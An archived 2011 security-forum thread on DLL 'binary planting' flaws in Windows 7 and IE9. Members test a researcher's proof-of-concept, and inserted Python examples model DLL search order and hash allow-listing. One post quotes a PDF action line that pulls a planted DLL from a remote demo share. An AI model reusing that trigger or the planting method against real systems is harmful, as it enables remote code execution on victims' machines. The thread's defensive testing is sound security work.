Unpatched DLL bugs let hackers exploit Windows 7 and IE9

Discussion in 'other security issues & news' started by aigle, May 7, 2011.

Thread Status:
Not open for further replies.
  1. aigle

    aigle Registered Member

  2. Rmus

    Rmus Exploit Analyst

    It might be the same as was used before in the previous "binary planting" vulnerabilities revealed by the same security company. This is their old blog, and their test site. I'm not sure if the tests have been updated:

    Binary Planting Attack Vectors
    http://blog.acrossecurity.com/2010/09/binary-planting-attack-vectors.html

    Online Binary Planting Exposure Tests
    http://www.binaryplanting.com/test.htm

    Binary Planting - Attack Vectors
    http://www.binaryplanting.com/attackVectors.htm#demonstrations

    It seems to be a pretty easy exploit to prevent, not only because of the many steps necessary to get the user to trigger it, but also because any security that blocks unauthorized executables (including DLLs) would snag it at the gate.

    From the article:

    regards,

    -rich
     
  3. m00nbl00d

    m00nbl00d Registered Member

    So... one more against IE's Protected Mode? Security researchers keep finding ways to avoid it. Microsoft will then plug it. Security researchers will find one more hole to plug...

    Microsoft should redesign IE's Protected Mode to work the same way as Chrome's does. Microsoft shouldn't feel ashamed for doing it, after all Google is only making use of Windows own security mechanisms.

    It sure would become harder to avoid (the sandbox).
     
  4. CloneRanger

    CloneRanger Registered Member

    @ Rmus

    Thanks for the test links :thumb: Don't remember doing them before, may have forgotten though as I've done that many ;)

    Anyway, I tried ALL the ones I could for XP & IE6, NONE worked :D

    I don't have ANY updates for XP or IE6 either!

    Here are a few test results

    [screenshot: wpgif.gif]

    I know it's Wordpad not Word, but thought it "might" work

    Not Adobe, but still

    [screenshot: pdf.gif]
     
  5. aigle

    aigle Registered Member

    Hi, actually the word 'dll' in any exploit gets my immediate attention.
     
  6. Rmus

    Rmus Exploit Analyst

    Yes, you have to use the vulnerable applications, which is why I never got any of the POCs to work in 2010. The PDF wouldn't even open in my version 6 of Adobe Reader. However, now I have a newer version and I see that the URI plugin cannot connect out automatically, as is also the case with Foxit that you show.

    This is the code in the PDF:

    Code:
    /URI (file:////www.binaryplanting.com/demo/windows_address_book) /S /URI
    
    Not only that, if I allow the action, the firewall intercepts the outbound connection,
    so the auto-infect threat fails on two counts:

    [screenshot: binaryplanting-pdf.gif]

    Likewise, with the other attack vectors:

    Binary Planting Through COM Servers
    http://blog.acrossecurity.com/2011/05/silently-pwning-protected-mode-ie9-and.html
    My version of MSWord isn't vulnerable and I don't use Powerpoint, so I set up my own test to see if a DLL could be loaded, and it cannot:

    [screenshot: testdocAE2.gif]

    From the computerworld article:
    Also, no go:

    [screenshot: hmmapiblock.gif]

    I submit that it doesn't matter what the triggering mechanism (remote code execution) is:
    Unauthorized DLLs either can or cannot load. There is no in-between.

    I'll be interested to see what new scenarios emerge at the conference, and whether or not
    the presenters can show other attack vectors that would affect me. I hope some of the POCs
    will work with me, because I'm interested to see how the outbound connection to a
    remote server is made. If not by the browser via port 80, the firewall will alert as it did in their PDF POC.

    regards,

    -rich
     
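The mechanism behind the PDF POC above is the Windows DLL search order: once a document is opened from the attacker's share, the application's current working directory is that share, and a DLL requested by bare name that does not exist in the application or system directories is taken from there. The following is an added example, not code from this thread or from ACROS Security. It simulates the documented SafeDllSearchMode order (application directory, System32, the 16-bit System directory, the Windows directory, the current working directory, then PATH). The directory layout, the "VictimApp" application and the lure document are constructed; hmmapi.dll and the demo share host are the names that appear in the thread, and rendering the POC's file:// URI as a UNC path is an assumption.

```python
"""Windows DLL search order in a binary-planting scenario (added example).

Models the documented SafeDllSearchMode search order for an application
that calls LoadLibrary with a bare DLL name. Everything about the victim
machine below is constructed for illustration.
"""
from pathlib import PureWindowsPath

# SafeDllSearchMode=1 (the default since XP SP2): the current working
# directory is searched after the system directories, but before PATH.
SAFE_SEARCH_ORDER = ("app_dir", "system32", "system", "windows", "cwd", "path")


def resolve_dll(name, dirs, present, *, cwd_in_search=True):
    """Return the lower-cased full path LoadLibrary would pick for a bare DLL
    name, or None if no directory in the search order holds it.

    dirs:    search-order slot -> list of directories for that slot
    present: set of lower-cased full paths that exist locally or on the share
    cwd_in_search=False models the CWDIllegalInDllSearch=0xFFFFFFFF registry
      hardening (or an application that called SetDllDirectory("")), which
      drops the current working directory from the search entirely.
    """
    for slot in SAFE_SEARCH_ORDER:
        if slot == "cwd" and not cwd_in_search:
            continue
        for base in dirs.get(slot, ()):
            candidate = str(PureWindowsPath(base) / name).lower()
            if candidate in present:
                return candidate
    return None


# Constructed victim: a document on the attacker's share has been opened,
# so the application's current working directory is that share (assumed
# UNC form of the POC's file:// URI).
SHARE = r"\\www.binaryplanting.com\demo\windows_address_book"


def demo_dirs():
    return {
        "app_dir": [r"C:\Program Files\VictimApp"],   # hypothetical application
        "system32": [r"C:\Windows\System32"],
        "system": [r"C:\Windows\System"],
        "windows": [r"C:\Windows"],
        "cwd": [SHARE],
        "path": [r"C:\Windows\System32", r"C:\Windows"],
    }


def demo_present():
    return {
        r"c:\program files\victimapp\victim.exe",
        r"c:\windows\system32\kernel32.dll",
        # The attacker plants the DLL next to the lure document; the victim
        # has no hmmapi.dll in any directory searched before the CWD.
        (SHARE + r"\hmmapi.dll").lower(),
        (SHARE + r"\lure.doc").lower(),
    }


def planting_scenario(cwd_in_search=True):
    """Where does LoadLibrary("hmmapi.dll") resolve in the constructed setup?"""
    return resolve_dll("hmmapi.dll", demo_dirs(), demo_present(),
                       cwd_in_search=cwd_in_search)


if __name__ == "__main__":
    print("kernel32.dll ->", resolve_dll("kernel32.dll", demo_dirs(), demo_present()))
    print("hmmapi.dll, CWD searched     ->", planting_scenario())
    print("hmmapi.dll, CWD not searched ->", planting_scenario(cwd_in_search=False))
```

With the CWD in the search the planted copy on the share wins; with the CWD removed (the registry hardening Microsoft shipped for this class of bug, or an application that drops it itself) the load simply fails, which is the outcome Rmus's screenshot shows from the allow-listing side.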
  7. CloneRanger

    CloneRanger Registered Member

    Writing your own malware now :D Only kidding ;)

    Yeah, great isn't it :)

    Me too, we'll see ;) I feel confident though :D
     
  8. Rmus

    Rmus Exploit Analyst

    If you are testing white listing security, you don't need a malware executable, just a non-whitelisted executable!

    Note this attack scenario:

    Binary Planting Through COM Servers
    http://blog.acrossecurity.com/2011/05/silently-pwning-protected-mode-ie9-and.html
    In my DLL test, I simulated a process to load and execute with a MSWord document, and I used the Win2K version of hmmapi.dll instead of the WinXP version. Not being on my computer's White List, the Win2K version cannot load and execute.

    This preventative measure (White Listing) will not, of course, be discussed at the Black Hat Conference.

    Too bad, because unless something changes, the outlook remains the same as last year:

    Binary Planting Update, Day 7
    Tuesday, August 24, 2010
    http://blog.acrossecurity.com/2010/08/binary-planting-update-day-7.html
    Accepting this dire pronouncement at face value that it is "the best possible workaround," I would feel almost helpless! How could I ever know that some product I'm using might be vulnerable!

    However, in addition to the preventative measures I can employ at the point of attack, I've considered the steps involved to get me to the point of attack (as outlined in the computerworld article). I wouldn't be inclined to be led that way in the first place.

    For example, even though I opened the POC PDF file, in the real world, I wouldn't open a PDF from an unknown/untrusted source.

    This is why I said that I'm interested in what is revealed at the Conference to see if other methods of attack have been devised/discovered that could trick me.

    regards,

    -rich
     
    Last edited: May 8, 2011
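The whitelisting test described in the post above (same file name, a different build of hmmapi.dll, load refused because its hash is not on the list) comes down to a per-load decision. The following is an added example, not the thread's code and not any product's: a hash allow list applied to DLL load records, with the extra rule that a load from a network path is refused regardless of hash. The load records, the "XP build"/"Win2K build"/"planted" DLL bytes, the process and file paths, and the allow list itself are all constructed stand-ins; a real deployment would hash the DLLs actually installed and feed real image-load events.

```python
"""Hash allow-list decision for DLL loads (added example).

Records, DLL bytes, paths and the allow list are constructed for the demo.
"""
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class ImageLoad:
    process: str        # image of the process doing the load (hypothetical)
    image_loaded: str   # full path the loader resolved for the DLL
    data: bytes         # bytes of the file at that path (constructed here)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def is_network_path(path: str) -> bool:
    """True for UNC paths (two leading backslashes), which covers WebDAV
    shares as well; forward-slash form is accepted for robustness."""
    return path.startswith("\\\\") or path.startswith("//")


def decide(load: ImageLoad, allow_list: set) -> tuple:
    """Allow-list rule: a DLL loads only if its hash is known-good, and never
    from a network path, whatever the hash. Returns (verdict, reason)."""
    if is_network_path(load.image_loaded):
        return "block", "loaded from a network path"
    digest = sha256_hex(load.data)
    if digest not in allow_list:
        return "block", "sha256 %s... not on allow list" % digest[:16]
    return "allow", "hash on allow list"


def audit(loads, allow_list):
    """Apply decide() to every record; returns [(path, verdict, reason)]."""
    return [(l.image_loaded, *decide(l, allow_list)) for l in loads]


# Constructed "DLL" contents: same file name, different builds, different hashes.
HMMAPI_XP = b"MZ hmmapi.dll constructed XP build"
HMMAPI_WIN2K = b"MZ hmmapi.dll constructed Win2K build"
HMMAPI_PLANTED = b"MZ hmmapi.dll constructed attacker build"
KERNEL32 = b"MZ kernel32.dll constructed"

# The allow list is built from what is already installed on the machine.
ALLOW_LIST = {sha256_hex(HMMAPI_XP), sha256_hex(KERNEL32)}

WORD = r"C:\Program Files\Office\WINWORD.EXE"   # hypothetical loading process

SAMPLE_LOADS = [
    ImageLoad(WORD, r"C:\Windows\System32\kernel32.dll", KERNEL32),
    ImageLoad(WORD, r"C:\Windows\System32\hmmapi.dll", HMMAPI_XP),
    # The test in the thread: an older build of the same DLL dropped beside a document
    ImageLoad(WORD, r"C:\Users\tester\testdoc\hmmapi.dll", HMMAPI_WIN2K),
    # The POC case: an attacker's DLL served from the demo share
    ImageLoad(WORD, r"\\www.binaryplanting.com\demo\windows_address_book\hmmapi.dll",
              HMMAPI_PLANTED),
]


def sample_audit():
    return audit(SAMPLE_LOADS, ALLOW_LIST)


if __name__ == "__main__":
    for path, verdict, reason in sample_audit():
        print(f"{verdict:5}  {path}  ({reason})")
```

The decision is binary, which is the point made earlier in the thread: the trigger (a PDF action, a COM server, a shortcut on a share) does not change the outcome once every image load is checked against a list of hashes the machine already trusts.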
  9. CloneRanger

    CloneRanger Registered Member

    Sho nuff :thumb:
    That would spoil their fun :D

    Exactly, and most people out there don't check to update their software.

    Only for testing ;)

    Trick you :eek: That'll be the day ;)

    I'll be testing alongside you :thumb:
     
  10. Rmus

    Rmus Exploit Analyst

    Well, I'm not that complacent! The nature of evil is to trick the unaware, so I want to always be alert to new trickery.

    Having said that, this year it's Win7 and IE9. Next year and the year after, it will be Win___ and IE___ (fill in the blanks)

    Up until recently, a gloating response would have been, "Switch to Mac." Well, we are learning that even that isn't a sure thing (if it ever was). Member kareldjag several years ago wrote, (I paraphrase) that all code has the potential for malicious abuse. Who believed him?

    The only answer for me has been to stay alert and be aware of the exploit attack methods to see if there is anything new (usually not) and to cover myself as best as possible, and let the cat-and-mouse games play themselves out!

    regards,

    -rich
     
    Last edited: May 8, 2011